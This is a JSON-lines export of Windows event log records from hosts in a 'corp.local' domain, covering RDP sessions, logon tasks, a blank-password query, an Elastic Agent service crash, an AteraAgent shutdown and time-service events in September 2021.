{"EventTime":"2021-09-23T12:24:41.128712+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":41,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3967,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":8896,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Begin session arbitration:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:41.148007+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":42,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3968,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":8896,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"End session arbitration:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:41.149321+05:45","Hostname":"IT02.corp.local","Keywords":"2305878193585782784","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7001,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":1101,"OpcodeValue":0,"RecordNumber":82504,"ExecutionProcessID":8384,"ExecutionThreadID":4268,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"User Logon Notification for Customer Experience Improvement Program","Opcode":"Info","TSId":"7","UserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:42.332081+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":21,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3969,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":1676,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session logon succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-23T12:24:43.083949+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:43.155370+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3970,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":1676,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Shell start notification received:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-23T12:24:44.224582+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:44.094334+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5059,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":18968852,"ExecutionProcessID":724,"ExecutionThreadID":6928,"Channel":"Security","Message":"Key migration operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t7680\r\n\tProcess Creation Time:\t???2021???-???09???-???23T06:39:43.167490400Z\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tECDSA_P256\r\n\tKey Name:\tMicrosoft Connected Devices Platform device certificate\r\n\tKey Type:\tUser key.\r\n\r\nAdditional Information:\r\n\tOperation:\tExport of persistent cryptographic key.\r\n\tReturn Code:\t0x0","Category":"Other System Events","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","ClientProcessId":"7680","ClientCreationTime":"2021-09-23T06:39:43.1674904Z","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"ECDSA_P256","KeyName":"Microsoft Connected Devices Platform device certificate","KeyType":"%%2500","Operation":"%%2464","ReturnCode":"0x0","EventReceivedTime":"2021-09-23T12:24:45.718167+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:55.593776+05:45","Hostname":"IT02.corp.local","Keywords":"2306124492780339200","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62170,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62170,"OpcodeValue":1,"RecordNumber":36842,"ExecutionProcessID":6320,"ExecutionThreadID":5836,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Logon task 'PostStartTasks' started with flags 0.","Opcode":"Start","LogonType":"0","TaskName":"PostStartTasks","EventReceivedTime":"2021-09-23T12:24:57.459533+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:55.385487+05:45","Hostname":"IT02.corp.local","Keywords":"2306124492780339200","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62171,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62170,"OpcodeValue":2,"RecordNumber":36836,"ExecutionProcessID":6320,"ExecutionThreadID":5836,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Logon task 'LaunchExperienceHost' finished with flags 0.","Opcode":"Stop","LogonType":"0","TaskName":"LaunchExperienceHost","EventReceivedTime":"2021-09-23T12:24:57.381408+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:51.695046+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28125,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28137,"OpcodeValue":0,"RecordNumber":36824,"ExecutionProcessID":6320,"ExecutionThreadID":5900,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Starting to refresh app resolver cache for scenario 1 with flags 2316.","Opcode":"Info","Scenario":"1","Flags":"2316","EventReceivedTime":"2021-09-23T12:24:52.914906+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163521+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9705,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9705,"OpcodeValue":1,"RecordNumber":36897,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Started enumeration of commands for registry key 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.","Opcode":"Start","KeyName":"Software\\Microsoft\\Windows\\CurrentVersion\\Run","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:07.772844+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9707,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9707,"OpcodeValue":1,"RecordNumber":36894,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Started execution of command 'vmtoolsd.exe\" -n vmusr'.","Opcode":"Start","Command":"vmtoolsd.exe\" -n vmusr","EventReceivedTime":"2021-09-23T12:25:08.882071+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163318+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9708,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9707,"OpcodeValue":2,"RecordNumber":36895,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Finished execution of command 'vmtoolsd.exe\" -n vmusr' (PID 5712).","Opcode":"Stop","PID":"5712","Command":"vmtoolsd.exe\" -n vmusr","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163348+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9706,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9705,"OpcodeValue":2,"RecordNumber":36896,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Finished enumeration of commands for registry key 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.","Opcode":"Stop","KeyName":"Software\\Microsoft\\Windows\\CurrentVersion\\Run","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T15:24:58.346435+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4779,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18970308,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":72,"Channel":"Security","Message":"A session was disconnected from a Window Station.\r\n\r\nSubject:\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nSession:\r\n\tSession Name:\t\tRDP-Tcp#14\r\n\r\nAdditional Information:\r\n\tClient Name:\t\tHOME-PC\r\n\tClient Address:\t\t172.16.20.11\r\n\r\n\r\nThis event is generated when a user disconnects from an existing Terminal Services session, or when a user switches away from an existing desktop using Fast User Switching.","Category":"Other Logon/Logoff Events","Opcode":"Info","AccountName":"Leo","AccountDomain":"CORP","LogonID":"0x28632a42","SessionName":"RDP-Tcp#14","ClientName":"HOME-PC","ClientAddress":"172.16.20.11","EventReceivedTime":"2021-09-23T15:24:59.803640+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T15:25:00.562461+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4800,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18970327,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":1188,"Channel":"Security","Message":"The workstation was locked.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\tSession ID:\t7","Category":"Other Logon/Logoff Events","Opcode":"Info","TargetUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","TargetUserName":"Leo","TargetDomainName":"CORP","TargetLogonId":"0x28632a42","SessionId":"7","EventReceivedTime":"2021-09-23T15:25:01.928868+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:11:09.293244+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4616,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12288,"OpcodeValue":0,"RecordNumber":881648,"ExecutionProcessID":4,"ExecutionThreadID":2076,"Channel":"Security","Message":"The system time was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x4bc\r\n\tName:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nPrevious Time:\t\t???2021???-???09???-???23T06:32:15.807648800Z\r\nNew Time:\t\t???2021???-???09???-???23T06:26:09.292333200Z\r\n\r\nThis event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer.","Category":"Security State Change","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","PreviousTime":"2021-09-23T06:32:15.8076488Z","NewTime":"2021-09-23T06:26:09.2923332Z","ProcessId":"0x4bc","ProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-09-23T12:17:16.414379+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:32:59.420270+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4797,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18969178,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":2124,"Channel":"Security","Message":"An attempt was made to query the existence of a blank password for an account.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nAdditional Information:\r\n\tCaller Workstation:\tIT02\r\n\tTarget Account Name:\tsa\r\n\tTarget Account Domain:\tIT02","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","Workstation":"IT02","TargetUserName":"sa","TargetDomainName":"IT02","EventReceivedTime":"2021-09-23T12:33:00.792833+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:43:28.716802+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4911,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13570,"OpcodeValue":0,"RecordNumber":18969302,"ExecutionProcessID":4,"ExecutionThreadID":348,"Channel":"Security","Message":"Resource attributes of the object were changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tFile\r\n\tObject Name:\tE:\\elastic-agent-7.14.2-windows-x86_64.zip\r\n\tHandle ID:\t0x20d0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x18b0\r\n\tProcess Name:\tC:\\Windows\\explorer.exe\r\n\r\nResource Attributes:\r\n\tOriginal Security Descriptor:\t\r\n\tNew Security Descriptor:\t\tS:ARAI(RA;;;;;WD;(\"IMAGELOAD\",TU,0x0,1))","Category":"Authorization Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","ObjectServer":"Security","ObjectType":"File","ObjectName":"E:\\elastic-agent-7.14.2-windows-x86_64.zip","HandleId":"0x20d0","NewSd":"S:ARAI(RA;;;;;WD;(\"IMAGELOAD\",TU,0x0,1))","ProcessId":"0x18b0","ProcessName":"C:\\Windows\\explorer.exe","EventReceivedTime":"2021-09-23T12:43:30.770787+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:46:15.964306+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":7034,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82513,"ExecutionProcessID":704,"ExecutionThreadID":5068,"Channel":"System","Message":"The Elastic Agent service terminated unexpectedly.  It has done this 1 time(s).","param1":"Elastic Agent","param2":"1","EventData.Binary":"45006C006100730074006900630020004100670065006E0074000000","EventReceivedTime":"2021-09-23T12:46:17.746134+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:10.638121+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10000,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69164,"ExecutionProcessID":8784,"ExecutionThreadID":7684,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Starting session 0 - ???2021???-???09???-???22T07:54:10.631898500Z.","Opcode":"Info","RmSessionEvent.RmSessionId":"0","RmSessionEvent.UTCStartTime":"2021-09-22T07:54:10.6318985Z","EventReceivedTime":"2021-09-22T13:39:11.694461+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:12.107282+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10002,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69166,"ExecutionProcessID":5292,"ExecutionThreadID":9200,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Shutting down application or service 'AteraAgent'.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262146","RmApplicationEvent.Pid":"5616","RmApplicationEvent.nFiles":"3","RmApplicationEvent.Files.File":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe, C:\\Program Files\\ATERA Networks\\AteraAgent\\Newtonsoft.Json.dll, C:\\Program Files\\ATERA Networks\\AteraAgent\\PubNub-Messaging.dll","EventReceivedTime":"2021-09-22T13:39:13.757127+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:20.185292+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10001,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69172,"ExecutionProcessID":8784,"ExecutionThreadID":7684,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Ending session 0 started ???2021???-???09???-???22T07:54:10.631898500Z.","Opcode":"Info","RmSessionEvent.RmSessionId":"0","RmSessionEvent.UTCStartTime":"2021-09-22T07:54:10.6318985Z","EventReceivedTime":"2021-09-22T13:39:21.804166+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:20.137940+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10007,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69170,"ExecutionProcessID":5292,"ExecutionThreadID":5728,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Application or service 'AteraAgent' could not be restarted.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262178","RmApplicationEvent.Pid":"5616","RmApplicationEvent.nFiles":"0","EventReceivedTime":"2021-09-22T13:39:21.804166+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:45:43.723817+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62144,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62132,"OpcodeValue":0,"RecordNumber":36652,"ExecutionProcessID":7580,"ExecutionThreadID":4708,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Updating install state of package Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe to 'Completed' with HRESULT 0.","Opcode":"Info","PackageFamilyName":"Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe","InstallState":"Completed","ErrorCode":"0","EventReceivedTime":"2021-09-22T13:45:45.113126+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:29:34.949177+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":256,"SourceName":"vmStatsProvider","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":69201,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The \"vmStatsProvider\" is successfully initialized for this Virtual Machine. WMI namespace: \"root\\cimv2\".","Category":"General","Opcode":"Info","Data":"root\\cimv2","EventReceivedTime":"2021-09-22T14:29:35.824247+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:29:34.590288+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2002,"SourceName":"Microsoft-Windows-PerfProc","ProviderGuid":"{72D211E1-4C54-4A93-9520-4901681B2271}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69202,"ExecutionProcessID":8040,"ExecutionThreadID":3760,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"\\BaseNamedObjects\\WmiProviderSubSystemHostJob","Opcode":"Info","Win32 Error":"1060","EventReceivedTime":"2021-09-22T14:29:35.824247+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:01:59.648923+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2017,"SourceName":"Microsoft-Windows-PerfOS","ProviderGuid":"{F82FB576-E941-4956-A2C7-A0CF83F6450A}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69190,"ExecutionProcessID":8040,"ExecutionThreadID":6540,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Unable to collect NUMA physical memory utilization data. The first four bytes (DWORD) of the Data section contains the status code.","Opcode":"Info","NTSTATUS":"2147483653","EventReceivedTime":"2021-09-22T14:02:01.653701+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T19:16:18.983531+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":35,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":646063,"ExecutionProcessID":940,"ExecutionThreadID":1964,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service is now synchronizing the system time with the time source 1.uk.pool.ntp.org,0x1 (ntp.m|0x1|0.0.0.0:123->129.250.35.250:123).","Opcode":"Info","TimeSource":"1.uk.pool.ntp.org,0x1 (ntp.m|0x1|0.0.0.0:123-&gt;129.250.35.250:123)","EventReceivedTime":"2021-09-22T19:16:20.985158+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
